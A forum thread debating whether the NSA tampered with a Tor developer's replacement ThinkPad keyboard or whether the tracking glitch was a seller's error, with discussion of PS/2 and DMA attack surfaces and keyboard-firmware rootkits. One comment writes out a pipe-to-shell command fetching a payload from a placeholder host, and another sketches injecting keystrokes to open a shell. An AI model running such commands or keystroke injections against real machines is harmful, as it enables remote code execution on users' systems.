The intelligence agency whose massive scope and pervasive operational shortcomings were recently exposed by one low-level operative had a slip-up in applying a well-publicized tactic to an obviously high value target.
A few comments:
• This "low-level operative" was a system administrator who used social engineering to obtain other people's authentication credentials and gain access to material to which he wasn't authorized. He wasn't the janitor or some clueless field agent.
• Did Snowden expose operational shortcomings? Absolutely. A lot of the programs that have been publicly revealed through his leaks have been running for over a decade without ever seeing the light of day, though. That tells me these "pervasive operational shortcomings" aren't very pervasive. (If they were, the NSA would be absolute shit at their mission.)
• I don't think Andrea is a "high value target," or at least high value enough to risk compromising whatever method they might use to bug her keyboard. I don't say this to belittle her or her work in any way — she seems to be a skilled programmer/hacker/infosec person. And that's exactly why this whole "the NSA is bugging her keyboard" theory doesn't make any sense.
Let's assume for the sake of argument that the NSA had planned to bug her keyboard, and that keyboard is now sitting in an NSA (or contractor) facility in/near Alexandria, Virginia, waiting for some modification to be made before shipping it back out. But, oops, they screwed up and forgot to fake the USPS tracking information. They know she knows because she tweeted about it. She's also tweeted that she can never trust the keyboard if/when it shows up. Why would they ship her a bugged keyboard at this point? If/when the keyboard shows up, she's probably going to take it apart and share anything interesting she finds with the world. There will be hard evidence.
Even if they hadn't bungled the tracking information in our hypothetical argument, they're risking exposure of the exact methods they use to bug a machine for not much potential gain. (Remember, Andrea's a skilled hacker/programmer. There's a very good chance she'll figure out what's going on and tell the world if she has any inkling that her laptop's been tampered with.)
• The keyboard she ordered fits a ThinkPad T60/T61/T400/T500 (and the equivalent "R" models, plus a few others). Internally, the keyboard and TrackPoint speak PS/2. While they could log keystrokes to an on-board chip and transmit keystrokes via radio, there aren't any especially interesting things the NSA can do to her laptop via a modified keyboard. They certainly won't be rooting it that way.
• I said that I don't think Andrea is a "high value target," despite her work on Tor, because everything about Tor is open. Anyone can download the code and see exactly how it works. The protocol is well-known. There's no curtain to peek behind and gain strategic information about Tor's workings.
So while I don't reject the argument that the NSA is trying to bug her laptop as impossible, I think it's exceedingly improbable. My money's still on "seller screwed up the tracking number."
I also like the part where the NSA is guarded by the Catch-22 "it wasn't them, because if it was, you'd never know", such that there's no scenario in which you could be convinced that the NSA did anything.
The flip side of this argument, which everyone here seems to be clutching onto and running with, is that if the NSA is capable of it, they're doing it at every available opportunity, even when it doesn't make any sense to.
> Internally, the keyboard and TrackPoint speak PS/2. While they could log keystrokes to an on-board chip and transmit keystrokes via radio, there aren't any especially interesting things the NSA can do to her laptop via a modified keyboard. They certainly won't be rooting it that way.
This is a joke, right? A keyboard and a keylogger would give you everything you need to root a computer.
My point was that the modified keyboard alone couldn't do it. It's not a FireWire device that can read/write things from/to memory however it pleases, insta-pwning a computer as soon as it's connected (unless something like VT-d is being used to contain DMA transfers). It's not even a USB device that could abuse some poorly written driver to gain access.
If a hypothetical modified keyboard is logging keystrokes, someone has to eventually retrieve it to get the logged data. If it's transmitting keystrokes via radio, someone has to be nearby to capture them and then steal the laptop to get at its (presumably encrypted) data.
Why when a shell is focused? Better to wait until the keyboard has been idle for some time, then send the keystrokes to open a shell, execute the needed commands, and close it afterward.
Here's a fun thought exercise for you, since my first reply didn't spark one. Imagine you're an evil keyboard. What evil could you accomplish? Hint: you don't even need your own radio, the computer's already got one.
"we describe how to tamper with a firmware upgrade to the Apple Aluminum Keyboard. We describe how an attacker can subvert an off-the-shelf keyboard by embedding into the firmware malicious code which allows a rootkit to survive a clean re-installation of the host operating system."
DMA via FireWire (or Thunderbolt or similar) allows you to very quickly poke at system memory with a near-zero risk of being detected.
An autonomously malicious PS/2 keyboard, on the other hand, is on the end of a slow (~12 kbit/s) serial interface. It can only simulate keypresses and receive updates about the keyboard LEDs' statuses. It doesn't know the current state of the system. It's as likely to type "curl http://innocent-looking.org/logo.jpg|sh" in a text editor as it is at a command prompt, so it can't type anything autonomously without running the (huge) risk of alerting its owner to its presence.
Edit: The "Reversing and exploiting an Apple firmware update" paper linked below talks about persisting a rootkit on a computer by using Spotlight to open Terminal, then typing a command to download and execute a payload. That runs the same risk of alerting the user to its presence, and it will completely fail if the user has remapped Cmd-Space to something else.
I would speculate that they might be interested in submitting a patch that compromises the Tor network in some subtle way that only they can exploit, and doing it in her name. Maybe added on to some other big change she submitted, in the hope that nobody will notice it.
Seems the Tor project is using Git for all of their projects, so doing something like that would probably require pwning whatever system she's creating commits on. I will say that putting a bug or something in her keyboard doesn't seem like a terribly efficient way of doing this.
I don't really think that they're trying to break Tor like this. More of a thought experiment - to figure out the likelihood that this is part of an attempt to break Tor, run through the details of exactly how this would be part of such an attempt. It doesn't sound all that practical when you run through how it would work if it was. If they wanted to do it, you'd think they have better ways than a rather sloppy attempt to intercept a laptop keyboard shipment, if that's actually what this was, instead of an ordinary shipment screw-up.
All good points, and I'd second that Andrea is unlikely to be a "high value target" [BTW, curious, who is building and releasing Tor binaries and Tor dependencies binaries?]. Still, as a developer she is a Tor user and it is possible that NSA opportunistically targets all Tor users. And even if not, I'm still finding it distasteful that NSA can legally intercept post and put up dragnet surveillance. It feels like they are using legal loopholes too. Not fair.
That generated more response than I expected. I actually do agree that, on balance, it's somewhat more likely that it's just a benign glitch; I should have said that. What I was really taking issue with is the dismissiveness with which you treated the suggestion that this might be an NSA attack. I was responding to what I saw as a slanted and unreasonable framing by doing the same thing from the other end.
So with less snark: I don't think it's exceedingly improbable at all, and whether ultimately it turns out to be the case or not, smugly guffawing the idea that the NSA may have used a trick like that isn't warranted. They really do intercept people's laptop shipments [1] to plant malware in them. They really do sneak tiny radio transmitters into end-user hardware. They really are trying to get backdoors into communication tools. I'll put it this way: if I worked on the kind of software Andrea works on, I would be seriously alarmed. Would you keep the keyboard?
On some specific points you made:
* That Snowden had access to other people's credentials seems like a serious operational shortcoming to me. The "low-level" part wasn't an attack on Snowden; the point is that a lot of people have that level of access. In general, the US intelligence apparatus makes a lot of well-publicized mistakes; I'm sure they make a great number of more subtle ones.
* On the NSA's shortcomings generally, I think this is actually nicely illustrative. Because a lot of the stuff Snowden revealed were things a lot of credible people already believed, based on things like weird locked server closets in telecom buildings and PRNGs that seemed fishy and pointless and hearsay reports of requests for backdoor access to communication tools and so on. There was just little hard evidence before Snowden. And there won't be here either. So this is entirely consistent with what the NSA was like in those decades where their programs "never saw the light of day".
* I think being a core Tor developer makes her a high value target. It's hard to imagine the NSA wanting to subvert all the things it's subverted and not wanting to backdoor Tor. Keylogging her keyboard is a great way to do that, either by compromising her somehow, or by just stealing her credentials. So I don't follow the "it doesn't make any sense" line of thinking.
* That she's now tweeted about it certainly makes it unlikely that, if the NSA has it, they'll go through with sending it bugged. But so?
Where I come out on this is that yes, it's probably nothing, but it should be treated with suspicion and carefulness, not laughed off because haha, what, do you think you're in a spy movie or something? Because, basically, we are.
[1] Yes, I know this is just the keyboard. I don't think that's a relevant difference.
> What I was really taking issue with is the dismissiveness with which you treated the suggestion that this might be an NSA attack. I was responding to what I saw as a slanted and unreasonable framing by doing the same thing from the other end.
I was dismissing the linked blog post as much as the suggestion of NSA involvement. The blog post took a single tweet with a single screenshot, screwed up half the facts ("tracking details for a computer Shepard ordered" — uh, no, it was a used laptop keyboard), sensationalized the other half ("it moved another four times around the military and industrial belt" — uh, no, it moved from IAD to Alexandria), and tacked a pile of rhetorical questions and conjecture on the end.